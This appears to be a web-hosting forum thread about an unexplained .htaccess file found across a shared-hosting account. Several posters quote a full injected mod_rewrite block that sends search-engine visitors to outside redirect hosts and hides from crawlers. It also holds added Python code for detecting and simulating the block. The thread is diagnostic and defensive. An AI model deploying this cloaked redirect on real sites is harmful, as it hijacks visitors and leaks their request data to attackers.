• 0

strange .htaccess file


Question

Hey,

One of my servers is producing a 500 internal server error, so I'm investigating it to see what's wrong.

There is a .htaccess file in the htdocs folder which I don't remember putting there (but I haven't used this server in a while).

This is what's in the .htaccess file:


# exgocgkctswo
RewriteEngine On
RewriteCond %{REQUEST_METHOD}   ^GET$
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?).*$   [NC]
RewriteCond %{HTTP_REFERER}     !^.*(q\=cache\:).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|****\sYou|Google).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(WinHTTP|WinNT4|WordPress|WOW64|WWWeasel|wwwster|yacy|Yahoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$   [NC]
RewriteCond %{HTTP_COOKIE}      !^.*xccgtswgokoe.*$
RewriteCond %{HTTPS}            ^off$
RewriteRule ^(.*)$   http://allinoneprogmon.net/cgi-bin/r.cgi?p=10003&i=8fea6e44&j=300&m=2ffda318012215990379383c2f892cd1&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME}  [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]
# exgocgkctswo


Could someone please explain to me what exactly that's doing? As I'm confident I didn't write that :(

Thanks in advance


22 answers to this question


  • 0

First thing first: DELETE IT. If you don't remember editing a file, remove what's been added in. It's as simple as that.

That being said: Is this your own VPS/server then? Might want to consider better security optimization on it and/or check access logs to see if a user logged in to edit the VPS or if there's a rogue script on your hosting account that adds a shell account to add that htaccess. I can tell right now that it rewrites URLs to an affiliate link.

You can just search http://allinoneprogmon.net/ (this is a link to google and NOT the website itself!) to see that you're not the only person with this problem either ;).

But yes the biggest culprit: Server is horribly insecure.

  • 0

Thanks for the replies,

It's a shared hosting server, so I don't control it, I just have FTP access.

I do not have Joomla on there, it's just a testing server, so unless you knew the direct path to a file it would redirect you to my proper site.

It could be that one of the test scripts I have online poses a security flaw, but it's highly unlikely that anyone would be able to guess the path to any of the scripts.

I have deleted the file, but I'm still getting a 500 error :(

I did google the web address, but the links shown didn't really give me much insight into what all the code in the file was :(

I'll get in contact with my hosting people to see if they can tell me more.

If anyone else has any more info on this I would appreciate it

Thanks again :D

  • 0

Just to add to what's happening,

I've just gone through every folder on the server, and found that the mystery .htaccess file was all over the server!

It was even in the folder which I don't know the name of. All I know is the folder is not web accessible, it's shown when I connect via FTP and has "htdocs", "logfiles" and "private" as folders.

I also found the .htaccess file in the logfiles folder as well as maybe 70% of the folders on the server.

Something definitely isn't right here :(
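One way to locate every copy of the injected block once the account has been mirrored to a local directory, shown as an added example that is not part of the original thread. It flags any .htaccess section wrapped in two identical single-token comment lines that also has a referer condition and an off-site RewriteRule with a `CO=` cookie flag; the marker, cookie name and host in the sample files are constructed placeholders.

```python
import os
import re
import tempfile

# Comment line holding a single token, e.g. "# exgocgkctswo"; the injected block
# quoted in this thread opens and closes with the same such line.
MARKER = re.compile(r"^#\s*(\S+)\s*$")
# RewriteRule whose target is an absolute URL (another host), followed by [flags].
EXTERNAL_RULE = re.compile(
    r"^[ \t]*RewriteRule[ \t]+\S+[ \t]+https?://(?P<host>[^/\s?]+)\S*[ \t]+\[(?P<flags>[^\]]*)\]",
    re.IGNORECASE | re.MULTILINE,
)
REFERER_COND = re.compile(
    r"^[ \t]*RewriteCond[ \t]+%\{HTTP_REFERER\}", re.IGNORECASE | re.MULTILINE
)

# Constructed sample content (shortened; placeholder marker, cookie and host).
INJECTED = r"""# zzmarkerzz
RewriteEngine On
RewriteCond %{REQUEST_METHOD}   ^GET$
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(google\.|bing\.).*$   [NC]
RewriteCond %{HTTP_COOKIE}      !^.*zzcookiezz.*$
RewriteRule ^(.*)$   http://redirector.example/cgi-bin/r.cgi?h=%{HTTP_HOST}&u=%{REQUEST_URI}  [R=302,L,CO=zzcookiezz:1:%{HTTP_HOST}:10080:/:0:HttpOnly]
# zzmarkerzz
"""
LEGIT = "Options -Indexes\nRewriteEngine On\nRewriteRule ^old\\.html$ /new.html [R=301,L]\n"


def find_marked_blocks(lines):
    """Return (start, end) index pairs of blocks wrapped in two identical marker lines."""
    open_at, blocks = {}, []
    for i, line in enumerate(lines):
        m = MARKER.match(line)
        if not m:
            continue
        token = m.group(1)
        if token in open_at:
            blocks.append((open_at.pop(token), i))
        else:
            open_at[token] = i
    return blocks


def inspect(text):
    """List marked blocks that redirect search-referred visitors off-site and set a cookie."""
    lines = text.splitlines()
    findings = []
    for start, end in find_marked_blocks(lines):
        body = "\n".join(lines[start:end + 1])
        rule = EXTERNAL_RULE.search(body)
        if not rule or not REFERER_COND.search(body):
            continue
        flags = [f.strip().upper() for f in rule.group("flags").split(",")]
        if any(f.startswith("CO=") for f in flags):
            # Report 1-based, inclusive line numbers for the whole block.
            findings.append({"host": rule.group("host"), "lines": (start + 1, end + 1)})
    return findings


def strip_blocks(text):
    """Return text with flagged blocks removed and every other directive kept."""
    lines = text.splitlines(keepends=True)
    drop = set()
    for finding in inspect(text):
        first, last = finding["lines"]
        drop.update(range(first - 1, last))
    return "".join(line for i, line in enumerate(lines) if i not in drop)


def scan(root):
    """Walk every directory under root (not only the web root) and report flagged files."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" not in files:
            continue
        path = os.path.join(dirpath, ".htaccess")
        with open(path, encoding="utf-8", errors="replace") as fh:
            found = inspect(fh.read())
        if found:
            hits.append((os.path.relpath(path, root).replace(os.sep, "/"), found))
    return sorted(hits, key=lambda hit: hit[0])


def demo():
    """Build a small constructed tree (htdocs root, logfiles, private) and scan it."""
    with tempfile.TemporaryDirectory() as root:
        layout = (("", LEGIT + INJECTED), ("logfiles", INJECTED), ("private", LEGIT))
        for sub, content in layout:
            os.makedirs(os.path.join(root, sub), exist_ok=True)
            with open(os.path.join(root, sub, ".htaccess"), "w", encoding="utf-8") as fh:
                fh.write(content)
        return scan(root)


if __name__ == "__main__":
    for rel, found in demo():
        print(rel, found)
```

`strip_blocks` removes only the marked section, so a file that also carries legitimate directives keeps them; a file that consists of nothing but the injected block comes back empty and can be deleted.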

  • 0

It's on an Apache Server I assume? It's just an ASCII file that is present for directory or root to control access r/w, etc. I would read up on it a little more before you freak out.

.htaccess with those commands are to block specific sites and specific referrers or allow :)

They are used all the time. If they are listed in a directory or subdirectory the .htaccess file overrides the one above it. It's for your security. If you do not understand it then ask the admin about them.

  • 0

> It's on an Apache Server I assume? It's just an ASCII file that is present for directory or root to control access r/w, etc. I would read up on it a little more before you freak out.
>
> .htaccess with those commands are to block specific sites and specific referrers or allow :)
>
> They are used all the time. If they are listed in a directory or subdirectory the .htaccess file overrides the one above it. It's for your security. If you do not understand it then ask the admin about them.

You're entirely wrong. If you even took one second to look over the .htaccess snippet he included, the entire thing consists of rewrite conditions and a single rewrite rule to a spam affiliate site.

Far from "for your security." Jeez. :angry:

  • 0

> You're entirely wrong. If you even took one second to look over the .htaccess snippet he included, the entire thing consists of rewrite conditions and a single rewrite rule to a spam affiliate site.
>
> Far from "for your security." Jeez. :angry:

Oh really? .htaccess does nothing for security? I guess my htaccess that prevents such things is not for my own benefit. I wasn't looking over this .htaccess snippet - It was a brief post to explain to him what .htaccess can do. I told him to ask his admin as he obviously didn't put them in there.

Your explanation does nothing for his post. Thank you very little.

  • 0

Thanks for the posts,

I'm in email communications with my hosting company, but they seem to be sending me in circles at the moment, which is leading me to think 2 things.

Either there has been a breakdown in communication as my support ticket is referred to other people, or they are trying to send me in circles long enough so they don't have to deal with me.

If it's the latter, then it leads me to believe that there has been a security breach of some kind on my server, which wasn't my fault. Coz I'm pretty sure if it was my fault, they would just tell me.

I'll update here when I know more about it, just in case someone else has this problem.

If anyone knows anything else, or has had this problem before I would be grateful for your insight :D

Thanks again

  • 0

> Thanks for the posts,
>
> I'm in email communications with my hosting company, but they seem to be sending me in circles at the moment, which is leading me to think 2 things.
>
> Either there has been a breakdown in communication as my support ticket is referred to other people, or they are trying to send me in circles long enough so they don't have to deal with me.
>
> If it's the latter, then it leads me to believe that there has been a security breach of some kind on my server, which wasn't my fault. Coz I'm pretty sure if it was my fault, they would just tell me.
>
> I'll update here when I know more about it, just in case someone else has this problem.
>
> If anyone knows anything else, or has had this problem before I would be grateful for your insight :D
>
> Thanks again

Mikeaag, have you gone through your entire hosting account and removed every instance of that .htaccess file? I would also go through and upgrade (or just remove) any scripts you're using (or not using) to start with. Then if you've got active email accounts, change all of their passwords.. Same thing with your [active] MySQL databases. Once you get that done, make sure that no other admin accounts were added to any of your CMS (Joomla was what you were using?) and go ahead and change your Admin passwords for those scripts as well. Then go directory-by-directory to look for files that have recently been uploaded that you know you didn't upload. More than likely will be .php extension so that it can execute code to run on your account.

:)

> Oh really? .htaccess does nothing for security? I guess my htaccess that prevents such things is not for my own benefit. I wasn't looking over this .htaccess snippet - It was a brief post to explain to him what .htaccess can do. I told him to ask his admin as he obviously didn't put them in there.
>
> Your explanation does nothing for his post. Thank you very little.

1.) You're taking ~my~ reply to your post out of context. You insinuated to the OP that the instance of .htaccess he had was "for his security" when in fact it was FAR from that. I already helped him prior to replying to you so you don't need to thank me "very little" at all.

2.) If you didn't look over his .htaccess snippet, then you're not doing any good posting to him. You have to read and look over his original post in its entirety. If you had you'd have had more helpful things to say to him rather than a brief posting "explaining" what .htaccess can do for him...

> It's on an Apache Server I assume? It's just an ASCII file that is present for directory or root to control access r/w, etc. I would read up on it a little more before you freak out.

He's freaking out for good measure. His account has been accessed by a 3rd party with malicious intent. The .htaccess FILES (in every directory in his account) have conditions and a single rewrite rule to a spam affiliate website. That is not an htaccess file "for his security." In fact, not only does it redirect to a spam website but if you read his initial post, it's tossing an ISE500 on his site! Malformed .htaccess will toss up an internal server 500 error. This will render the live site entirely useless until it's resolved. That is also not indicative of "for his security."

> .htaccess with those commands are to block specific sites and specific referrers or allow :)

Here you insinuate (yet again) that his snippet is "okay." It's actually ~not~ okay. There are conditions that are being told to redirect to a spam affiliate website albeit malformed. Remember, this is not blocking anything. Did you see this RewriteEngine On at the beginning of the conditions and single rewrite?

Or perhaps did you see this after all of the conditions?

RewriteRule ^(.*)$   http://allinoneprogmon.net/cgi-bin/r.cgi?p=10003&i=8fea6e44&j=300&m=2ffda318012215990379383c2f892cd1&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME}  [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]

> They are used all the time. If they are listed in a directory or subdirectory the .htaccess file overrides the one above it. It's for your security. If you do not understand it then ask the admin about them.

Yes, .htaccess files are used all the time but.. here you need to be specific to the OP. His specific .htaccess is not for his security. However, .htaccess in general isn't just for security purposes.

http://httpd.apache.org/docs/1.3/mod/mod_rewrite.html#RewriteCond

Example:

To rewrite the Homepage of a site according to the "User-Agent:" header of the request, you can use the following:

RewriteCond  %{HTTP_USER_AGENT}  ^Mozilla.*
RewriteRule  ^/$                 /homepage.max.html  [L]

RewriteCond  %{HTTP_USER_AGENT}  ^Lynx.*
RewriteRule  ^/$                 /homepage.min.html  [L]

RewriteRule  ^/$                 /homepage.std.html  [L]

Interpretation: If you use Netscape Navigator as your browser (which identifies itself as 'Mozilla'), then you get the max homepage, which includes Frames, etc. If you use the Lynx browser (which is Terminal-based), then you get the min homepage, which contains no images, no tables, etc. If you use any other browser you get the standard homepage.
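What the injected conditions select, as an added example that is not part of the original thread: it applies the quoted RewriteCond lines in order to a few constructed requests. The referer, cache and cookie patterns are copied from the file quoted on this page, the User-Agent pattern is a subset of the 23 exclusion lines, and the sample header values are made up.

```python
import re

# Referer test copied from the second RewriteCond of the quoted file ([NC] = ignore case).
SEARCH_REFERER = re.compile(
    r"^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|"
    r"altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|"
    r"search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?).*$",
    re.IGNORECASE,
)
CACHE_REFERER = re.compile(r"^.*(q\=cache\:).*$", re.IGNORECASE)
# Subset of the tokens from the quoted file's User-Agent exclusion lines.
UA_EXCLUDED = re.compile(
    r"^.*(bot|Crawl|curl|Google|iPhone|Linux|Mac\sOS|Macintosh|Mobile|perl|Python|"
    r"Slurp|spider|wget|Windows\sNT\s4|WOW64|Yahoo|Yandex).*$",
    re.IGNORECASE,
)
COOKIE_SEEN = re.compile(r"^.*xccgtswgokoe.*$")
COOKIE_FLAG = "CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly"


def would_redirect(method, referer, user_agent, cookie, https):
    """Apply the conditions in file order; RewriteCond lines are ANDed by default."""
    if method != "GET":
        return False, "not a GET request"
    if not SEARCH_REFERER.match(referer):
        return False, "referer is not a search engine"
    if CACHE_REFERER.match(referer):
        return False, "referer is a search-engine cache view"
    if UA_EXCLUDED.match(user_agent):
        return False, "user agent is on the exclusion list"
    if COOKIE_SEEN.match(cookie):
        return False, "marker cookie already set"
    if https:
        return False, "request arrived over HTTPS"
    return True, "302 redirect to the external r.cgi URL"


def cookie_lifetime_days(flag):
    """mod_rewrite's CO flag is NAME:VALUE:DOMAIN:lifetime-in-minutes:path:secure:httponly."""
    fields = flag.split("=", 1)[1].split(":")
    return int(fields[3]) / (60 * 24)


# Constructed sample header values.
IE_XP = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
GOOGLEBOT = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
FIREFOX_LINUX = "Mozilla/5.0 (X11; Linux i686; rv:1.9.2) Gecko/20100101 Firefox/3.6"
SERP = "http://www.google.com/search?q=example+site"

CASES = {
    "owner types the URL directly": ("GET", "", IE_XP, "", False),
    "visitor clicks a search result": ("GET", SERP, IE_XP, "", False),
    "same visitor, next click": ("GET", SERP, IE_XP, "xccgtswgokoe=1", False),
    "search engine crawler": ("GET", SERP, GOOGLEBOT, "", False),
    "Linux desktop browser": ("GET", SERP, FIREFOX_LINUX, "", False),
    "search cache view": ("GET", "http://www.google.com/search?q=cache:example", IE_XP, "", False),
    "site served over HTTPS": ("GET", SERP, IE_XP, "", True),
}


def evaluate_cases():
    """Map each constructed case to (redirected, reason)."""
    return {name: would_redirect(*request) for name, request in CASES.items()}


if __name__ == "__main__":
    for name, (hit, reason) in evaluate_cases().items():
        print(f"{name:32} {'REDIRECT' if hit else 'served'}  ({reason})")
    print("cookie lifetime in days:", cookie_lifetime_days(COOKIE_FLAG))
```

Only the second case is redirected: an owner checking the site directly, a crawler, and a visitor who already holds the cookie all see the normal page, so testing from your own browser can miss the redirect.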

  • 0

# exgocgkctswo
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?).*$ [NC]
RewriteCond %{HTTP_REFERER} !^.*(q\=cache\:).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|****\sYou|Google).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WOW64|WWWeasel|wwwster|yacy|Yahoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC]
RewriteCond %{HTTP_COOKIE} !^.*xccgtswgokoe.*$
RewriteCond %{HTTPS} ^off$
RewriteRule ^(.*)$ http://checkforsec.com/cgi-bin/r.cgi?p=9004&i=439e8f25&j=305&m=f299e5a650188b64b99088237f69801a&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME} [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]
# exgocgkctswo

Hello, I just found your forum by searching google for what is going on with my server. I also suspect that my host is insecure but I'm not positive. One of the things that has me suspicious is the way they act about it when I call them. For instance, he was quick to say that I was running Joomla when I am not. Then he switched to WordPress. When I mentioned the CMS I am actually running he had no idea yet it is just as popular. I'm using e107 and it is up to date. I'm not going to call out the host as I'm not certain but he straight said on the phone that another guy complained earlier. To me that is suspicious. Have you resolved your problem? This is the third instance first was a few months ago. Now twice in July. It's a ton of fun removing them from every directory isn't it? I'll holla at ya if I find more info.

  • 0

> Hello, I just found your forum by searching google for what is going on with my server. I also suspect that my host is insecure but I'm not positive. One of the things that has me suspicious is the way they act about it when I call them. For instance, he was quick to say that I was running Joomla when I am not. Then he switched to WordPress. When I mentioned the CMS I am actually running he had no idea yet it is just as popular. I'm using e107 and it is up to date. I'm not going to call out the host as I'm not certain but he straight said on the phone that another guy complained earlier. To me that is suspicious. Have you resolved your problem? This is the third instance first was a few months ago. Now twice in July. It's a ton of fun removing them from every directory isn't it? I'll holla at ya if I find more info.

Hey thanks for the reply,

I still haven't found out how the files got on to the server, but as far as I can see they haven't come back.

I don't believe there are any CMS's on my server, and there's even less of a chance of me having e107 on there.

I'll PM you the host I'm with to see if we are using the same people. I agree in not publicly accusing the hosting company without actual proof.

  • 0

Okay so in response to the first guy that posted about this... I'm a web designer so I have multiple sites all with different setups, scripts, servers, CMS, etc.

I have had this identical problem on 9 of my sites. Some with WordPress, some with no CMS... Some have special javascripts, some have just basic HTML, it has affected my sites on 4 completely different hosts. I have a very close friendship with one of the web hosts and he told me that there was no Denial of Access logs on any of the sites that were hacked... So whoever got into the FTP of the site knew the password.

I have gone through and cleaned out all of the .htaccess files of the sites and the "hacker" has actually come back and re-hacked the website adding all the files back in. The most recent attack was this morning at 6:54am EST. I've reset my FTP password on all my accounts, and I even had the host completely wipe out the client account and re-install it.

Glad to know I'm not the only one but this is really ****ing me and my clients off that every couple of days their site is down... What's the deal???

This is the code that I get.

# exgocgkctswo
RewriteEngine On
RewriteCond %{REQUEST_METHOD}   ^GET$
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?).*$   [NC]
RewriteCond %{HTTP_REFERER}     !^.*(q\=cache\:).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|****\sYou|Google).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(WinHTTP|WinNT4|WordPress|WOW64|WWWeasel|wwwster|yacy|Yahoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$   [NC]
RewriteCond %{HTTP_COOKIE}      !^.*xccgtswgokoe.*$
RewriteCond %{HTTPS}            ^off$
RewriteRule ^(.*)$   http://indanetwall.net/cgi-bin/r.cgi?p=10001&i=53af6b67&j=306&m=ce392a89cc7aa206e28425d0252cda92&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME}  [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]
# exgocgkctswo

  • 0

